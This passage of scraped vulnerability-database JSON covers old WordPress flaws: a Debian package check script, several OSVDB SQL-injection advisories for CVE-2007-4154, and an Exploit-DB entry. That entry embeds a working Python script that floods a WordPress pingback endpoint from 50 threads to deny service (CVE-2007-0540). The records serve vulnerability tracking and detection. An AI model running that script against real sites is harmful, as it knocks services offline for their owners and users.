script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"wordpress\", ver:\"2.0.10-1etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "description": "## Vulnerability Description\nWordpress contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'options-writing.php' script not properly sanitizing user-supplied input to the 'page_options' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor Specific News/Changelog Entry: http://trac.wordpress.org/ticket/4690\nOther Advisory URL: http://mybeni.rootzilla.de/mybeNi/2007/wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nearly_wrote_the_first_blog_worm/\nISS X-Force ID: 35719\n[CVE-2007-4154](https://vulners.com/cve/CVE-2007-4154)\n", "modified": "2007-07-31T00:00:00", "published": "2007-07-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39372", "id": "OSVDB:39372", "title": "Wordpress options-writing.php page_options Variable SQL Injection", "type": "osvdb", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "description": "## Vulnerability Description\nWordpress contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'options-reading.php' script not properly sanitizing user-supplied input to the 'page_options' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor Specific News/Changelog Entry: http://trac.wordpress.org/ticket/4690\nOther Advisory URL: http://mybeni.rootzilla.de/mybeNi/2007/wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nearly_wrote_the_first_blog_worm/\nISS X-Force ID: 35719\n[CVE-2007-4154](https://vulners.com/cve/CVE-2007-4154)\n", "modified": "2007-07-31T00:00:00", "published": "2007-07-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39373", "id": "OSVDB:39373", "title": "Wordpress options-reading.php page_options Variable SQL Injection", "type": "osvdb", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "description": "## Vulnerability Description\nWordpress contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'options-discussion.php' script not properly sanitizing user-supplied input to the 'page_options' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor Specific News/Changelog Entry: http://trac.wordpress.org/ticket/4690\nOther Advisory URL: http://mybeni.rootzilla.de/mybeNi/2007/wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nearly_wrote_the_first_blog_worm/\nISS X-Force ID: 35719\n[CVE-2007-4154](https://vulners.com/cve/CVE-2007-4154)\n", "modified": "2007-07-31T00:00:00", "published": "2007-07-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39374", "id": "OSVDB:39374", "title": "Wordpress options-discussion.php page_options Variable SQL Injection", "type": "osvdb", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "description": "## Vulnerability Description\nWordpress contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'options-misc.php' script not properly sanitizing user-supplied input to the 'page_options' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor Specific News/Changelog Entry: http://trac.wordpress.org/ticket/4690\nOther Advisory URL: http://mybeni.rootzilla.de/mybeNi/2007/wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nearly_wrote_the_first_blog_worm/\nISS X-Force ID: 35719\n[CVE-2007-4154](https://vulners.com/cve/CVE-2007-4154)\n", "modified": "2007-07-31T00:00:00", "published": "2007-07-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39377", "id": "OSVDB:39377", "title": "Wordpress options-misc.php page_options Variable SQL Injection", "type": "osvdb", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "description": "## Vulnerability Description\nWordpress contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'options-permalink.php' script not properly sanitizing user-supplied input to the 'page_options' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor Specific News/Changelog Entry: http://trac.wordpress.org/ticket/4690\nOther Advisory URL: http://mybeni.rootzilla.de/mybeNi/2007/wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nearly_wrote_the_first_blog_worm/\nISS X-Force ID: 35719\n[CVE-2007-4154](https://vulners.com/cve/CVE-2007-4154)\n", "modified": "2007-07-31T00:00:00", "published": "2007-07-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39376", "id": "OSVDB:39376", "title": "Wordpress options-permalink.php page_options Variable SQL Injection", "type": "osvdb", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "description": "## Vulnerability Description\nWordpress contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'options-privacy.php' script not properly sanitizing user-supplied input to the 'page_options' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor Specific News/Changelog Entry: http://trac.wordpress.org/ticket/4690\nOther Advisory URL: http://mybeni.rootzilla.de/mybeNi/2007/wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nearly_wrote_the_first_blog_worm/\nISS X-Force ID: 35719\n[CVE-2007-4154](https://vulners.com/cve/CVE-2007-4154)\n", "modified": "2007-07-31T00:00:00", "published": "2007-07-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39375", "id": "OSVDB:39375", "title": "Wordpress options-privacy.php page_options Variable SQL Injection", "type": "osvdb", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "description": "## Vulnerability Description\nWordpress contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'options-general.php' script not properly sanitizing user-supplied input to the 'page_options' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor Specific News/Changelog Entry: http://trac.wordpress.org/ticket/4690\nOther Advisory URL: http://mybeni.rootzilla.de/mybeNi/2007/wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nearly_wrote_the_first_blog_worm/\nISS X-Force ID: 35719\n[CVE-2007-4154](https://vulners.com/cve/CVE-2007-4154)\n", "modified": "2007-07-31T00:00:00", "published": "2007-07-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39371", "id": "OSVDB:39371", "title": "Wordpress options-general.php page_options Variable SQL Injection", "type": "osvdb", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "description": "## Solution Description\nUpgrade to version 2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\n[Secunia Advisory ID:23912](https://secuniaresearch.flexerasoftware.com/advisories/23912/)\n[Related OSVDB ID: 33007](https://vulners.com/osvdb/OSVDB:33007)\n[Related OSVDB ID: 33005](https://vulners.com/osvdb/OSVDB:33005)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0562.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0557.html\n[CVE-2007-0540](https://vulners.com/cve/CVE-2007-0540)\n", "modified": "2007-01-24T10:18:45", "published": "2007-01-24T10:18:45", "href": "https://vulners.com/osvdb/OSVDB:33006", "id": "OSVDB:33006", "title": "WordPress Pingback Crafted URI Binary Content DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T10:30:31", "bulletinFamily": "exploit", "description": "WordPress 1.x/2.0.x Pingback SourceURI Denial Of Service and Information Disclosure Vulnerability. CVE-2007-0540. Webapps exploit for php platform", "modified": "2007-01-24T00:00:00", "published": "2007-01-24T00:00:00", "id": "EDB-ID:29522", "href": "https://www.exploit-db.com/exploits/29522/", "type": "exploitdb", "title": "WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service and Information Disclosure Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/22220/info\r\n\r\nWordPress is prone to a denial-of-service vulnerability and an information-disclosure vulnerability.\r\n\r\nAttackers can exploit these issues to consume memory and bandwidth resources, denying service to legitimate users, or to gain information that may aid in further attacks.\r\n\r\nVersions prior to WordPress 2.1 are vulnerable. \r\n\r\n#!/bin/env python\r\n# vim:ft=python:fileencoding=utf-8\r\n#\r\nfrom xmlrpclib import ServerProxy\r\nfrom urllib import urlopen\r\nfrom random import randint\r\n\tfrom threading import Thread\r\n \t\r\n# Define target\r\ntargetURL = \"http://www.example.com/file.html\"\r\nhugeFile = \"http://www.example.com/path-to-a-big-iso-file-from-a-major-linux-distribution.iso#i%d\"\r\n \t\r\n# Fetch Pingback-URL\r\npingbackURL = urlopen(targetURL).headers[\"X-Pingback\"]\r\nprint \"Target URL: %s\\nPingback: %s\" % (targetURL, pingbackURL)\r\n \t\r\n# Attack\r\ndef attack():\r\n server = ServerProxy(pingbackURL)\r\n try: server.pingback.ping(hugeFile % randint(10, 1000), targetURL)\r\n except: pass\r\nfor i in range(50):\r\n Thread(target=attack).start()\r\nprint \"-- attacking --\"", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29522/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:22", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-01-25T00:00:00", "published": "2007-01-25T00:00:00", "id": "SECURITYVULNS:VULN:7108", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7108", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}